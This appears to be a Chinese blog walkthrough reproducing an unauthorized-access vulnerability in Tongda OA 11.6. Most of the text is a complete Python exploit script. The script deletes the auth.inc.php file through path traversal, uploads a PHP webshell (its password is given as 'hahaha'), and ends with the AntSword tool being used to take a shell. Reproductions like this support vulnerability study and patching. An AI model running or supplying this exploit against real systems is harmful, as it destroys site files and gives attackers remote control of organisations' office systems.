通达OA11.6版本越权漏洞复现

环境搭建

现在通达官网已经把版本升级到了11.7，所以下载11.6版本需要去第三方下载平台

安装OA

傻瓜式安装，配置界面如下。完成安装之后就可以暂时不用管它了

访问网站

界面如下：

使用exp脚本

脚本内容如下，核心思路就是删除网站里的一个名为auth.inc.php的文件，进而越权拿shell

import requests
#填写ip
target="http://ip/"  
#一句话木马的密码是hahaha   
payload=""
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")
#删除网站里的一个名为auth.inc.php的文件
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"  
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url,files=files)
url=target+"/_deconf.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

程序执行之后出现了一个URL，那个URL就是一句话木马所在位置

蚁剑拿shell